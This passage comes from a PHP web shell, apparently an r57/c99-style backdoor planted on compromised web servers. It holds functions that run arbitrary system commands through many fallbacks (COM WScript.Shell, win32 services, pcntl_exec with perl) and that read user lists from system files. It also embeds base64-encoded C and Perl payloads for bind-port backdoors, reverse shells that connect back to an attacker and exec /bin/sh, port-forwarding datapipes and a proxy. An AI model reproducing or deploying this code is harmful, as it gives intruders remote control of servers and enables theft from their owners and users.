".@escapeshellarg($cfe)." >"$output""));} @win32_start_service($n_ser); @win32_stop_service($n_ser); @win32_delete_service($n_ser); while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded("win32std")) { $output=$tempdir.uniqid('NJ'); if(!@function_exists('escapeshellarg')){@win_shell_execute('..............windowssystem32cmd.exe /c '.$cfe.' > "'.$output.'"');} else{@win_shell_execute('..............windowssystem32cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix) { $output=$tempdir.uniqid('NJ'); $suntzu = new COM("WScript.Shell"); if(!@function_exists('escapeshellarg')){$suntzu->Run('c:windowssystem32cmd.exe /c '.$cfe.' > "'.$output.'"');} else{$suntzu->Run('c:windowssystem32cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} $res=moreread($output); @unlink($output); } elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]nn'; $output=$tempdir.uniqid('pcntl'); $pid = @pcntl_fork(); if ($pid == -1) { $res .= '[-] Could not children fork. Exit'; } else if ($pid) { if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} else {$res .= '[-] Error. Command incorrect.';} } else { $cfe = array(" -e 'system("$cfe > $output")'"); if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); die(); } $res=moreread($output); @unlink($output); } /* elseif(1) { } */ } return htmlspecialchars($res); } function get_users($filename) { $users = $rows = array(); $rows=@explode("n",moreread($filename)); if(!$rows[0]){$rows=@explode("n",readzlib($filename));} if(!$rows[0]) return 0; foreach ($rows as $string) { $user = @explode(":",trim($string)); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function err($n,$txt='') { echo ''; return null; } function perms($mode) { if (!$GLOBALS['unix']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value,$checked=0) { $ret = ""; } function which($pr) { $path = ''; $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return false; } } function ps($pr) {global $unix; $path = ''; if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} else{$path = ex("tasklist | findstr "$pr"");} if(!empty($path)) { return $path; } else { return false; } } function locate($pr) { $path = ''; $path = ex("locate $pr"); if(!empty($path)) { return $path; } else { return false; } } function cf($fname,$text) { if(!morewrite($fname,@base64_decode($text))){err(0);}; } function sr($l,$t1,$t2) { return ""; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = 'b'.$v.'b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"\1",$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; $prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT 0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09 DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1 BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA 